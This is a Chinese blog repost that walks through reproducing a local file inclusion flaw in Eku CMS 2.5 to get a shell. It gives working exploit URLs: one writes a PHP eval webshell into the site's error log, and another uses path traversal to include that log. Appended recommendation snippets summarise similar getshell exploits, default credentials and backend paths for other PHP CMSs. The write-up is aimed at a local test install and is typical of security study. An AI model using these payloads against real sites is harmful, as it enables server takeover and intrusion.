易酷 cms2.5 本地文件包含漏洞 getshell

最新推荐文章于 2022-12-09 16:23:28 发布
最新推荐文章于 2022-12-09 16:23:28 发布
阅读量1.8k 收藏 2
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/Oran9e/p/8873793.html
版权

易酷 cms2.5  本地文件包含漏洞 getshell

首先下载源码安装(http://127.0.0.1/test/ekucms2.5/install.php)

 安装成功直接进行复现吧

本地包含一句话木马

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/{~eval($_POST[orange])}

 

 

会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日

错误日志内容

 

进行包含错误日志,地址:

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/\..\temp\logs\18_04_18.log

 

 

验证下:

 

 

源码链接(链接: https://pan.baidu.com/s/1K8dmimbrqO41tNemhnKeAQ 密码: 3y48)

 

转载于:https://www.cnblogs.com/Oran9e/p/8873793.html

weixin_30505485
关注
易酷CMS2.5本地文件包含漏洞复现
谢公子的博客
11-28 3369
易酷CMS是一款影片播放CMS。该CMS2.5版本存在本地文件包含漏洞。我们可以利用这个漏洞,让其包含日志文件,然后再利用报错信息将一句话木马写入日志中。然后利用文件包含漏洞包含该日志文件,再用菜刀连接拿shell。 渗透之前的操作,比如先用后台扫描工具,扫描得到该网站的后台目录结构,才更好的进行后面的操作。 我们通过访问该url,将一句话木马写入日志文件中 http://192.168.1...
常见的CMS漏洞解析!
最新发布
muyuchen110的博客
08-04 1281
【代码】常见的CMS漏洞解析!
ekucms2.5本地文件包含漏洞-代码审计
weixin_44076904的博客
02-17 4585
ekucms2.5本地文件包含漏洞-代码审计 一、前言 ​ 为了学习Thinkphp框架的运行原理以及加强自身代码审计能力,所以特意在网上寻找了一个由php编写的CMS漏洞文章,对其进行复现和逆向代码审计。漏洞参考文章如下: 易酷 cms2.5 本地文件包含漏洞 getshell - Oran9e - 博客园 (cnblogs.com) 调试工具: phpstudy2018+phpstorm+xdebug; Firefox; xdebug helper 工具使用说明: ​ (1) phps
LvyeCms-含有任意文件写入漏洞的源码.zip
12-31
LvyeCms-含有任意文件写入漏洞的源码,亲测真实有效,可用,如有侵权,请联系CSDN管理员删除
易酷CMS2.5本地文件包含漏洞分析
weixin_39915160的博客
01-14 3998
文件包含漏洞是指开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。正是这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞易酷 cms2.5 本地文件包含漏洞可getshell。 下载源码安装(http://127.0.0.1/test/ekucms2.5/install.php) 安装成功后进行复现,本地包含写一句话木马。 http://127.0.0.1/test/ekucms2.5/?s=my/show/id/{~eval...
代码审计:熊海cms 首页文件包含漏洞复现
qq_43233085的博客
03-16 1829
代码审计:熊海cms 首页文件包含漏洞复现熊海cms代码审计漏洞复现 熊海cms 熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。 代码审计 先使用Seay工具审计一波,根据关键代码回溯。 工具显示index.php文件包含函数存在变量,存在...
文件包含漏洞利用
Jim的博客
09-21 755
易酷CMS v2.5
05-14
易酷免费影视系统V2.5 Final对比以往版本做了如下操作: 1、多分类批量处理 2、分页模板独立 3、后台视频管理可按播放器或者星级选择视频 4、采用友言社会化评论系统 5、后台生成显示当前状态 6、幻灯片支持...
易酷CMS v2.5.zip
07-07
易酷免费影视系统V2.5 Final对比以往版本做了如下操作: 1、多分类批量处理 2、分页模板独立 3、后台视频管理可按播放器或者星级选择视频 4、采用友言社会化评论系统 5、后台生成显示当前状态 6、幻灯片支持...
易酷cms电影程序
10-05
易酷cms强大的开源电影系统
基于PHP易酷CMS php影视视频播放系统.zip
08-29
基于PHP易酷CMS php影视视频播放系统.zip
finecms aip.php漏洞,通杀FineCMS5.0.8及版本以下getshell漏洞
weixin_32943857的博客
03-11 572
前言跟着上次的finecms,在漏洞时代又找了一个漏洞来审计。但是他改了函数里面的传参,我也弄了一阵子才搞明白这个传参原来需要加密过的参数,还有就是这个远程下载再上传,有个小问题,那篇文章没有说明,等下再系统说下。漏洞详情代码位置和代码位置\finecms\dayrui\controllers\member\Api.php代码public function down_file() {$p = ar...
MaxSite CMS 代码问题漏洞(CVE-2022-25411)
千寻的博客
12-09 1973
Maxsite CMS存在文件上传漏洞,攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。
PHPOKCMS 4.9.015版本存在文件上传漏洞( CNVD-2018-17547)
千寻的博客
05-06 1998
0x01 简介 PHPOK从2005年开发至今15年,是一款高效的网站建设内容管理系统,实现高定制化的开源免费建站cms 系统,百万数据量级网站平台建设,包括企业网站,电子商务平台及各种小程序和公众号平台建设 0x02 漏洞概述 phpok是一套采用PHP+MySQL开发的企业网站系统, 其4.8.338及4.9.015版本存在任意文件上传漏洞, 攻击者可利用漏洞上传任意文件,获取网站权限。 0x03 漏洞编号 https://www.cnvd.org.cn/flaw/show/CNVD-2018-
熊海博客php版本,熊海cms v1.0 PHP低版本无条件Getshell | CN-SEC 中文网
weixin_32349561的博客
04-02 683
摘要问题在index.php中,代码不多我直接贴出来了Payload:/?r=../文件名在PHP 5.3.29以下版本中可突破限制包含其他文件Payload:../1.txt………………………………………………………………………………………………………………………………………………………………………………………………………………….利用Windows文件长度特性绕过PHP后缀拼接还有一种是使用%...
actcms网站管理系统漏洞0day
fengling132的专栏
06-05 2385
漏洞版本:actcms3.0以下版本 默认后台路径:admin/ 默认数据库:App_Data/DataBase.mdb 默认账户:admin 默认密码: admin 利用点:FCK编译器 漏洞界面: admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmi
帝国php漏洞,帝国cms远程代码执行漏洞-1
weixin_35033275的博客
03-18 1032
帝国cms简介:《帝国网站管理系统》英文译为"Empire CMS",简称"Ecms",它是基于B/S结构,且功能强大,帝国CMS-logo易用的网站管理系统。系统由帝国开发工作组独立开发,是一个经过完善设计的适用于Linux/windows/Unix等环境下高效的网站解决方案。这次我们将给出此系统中的两个漏洞,对漏洞原理进行分析,并将漏洞复现。一、后台数据库备份处存在代码执行漏洞1、漏洞简介:在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值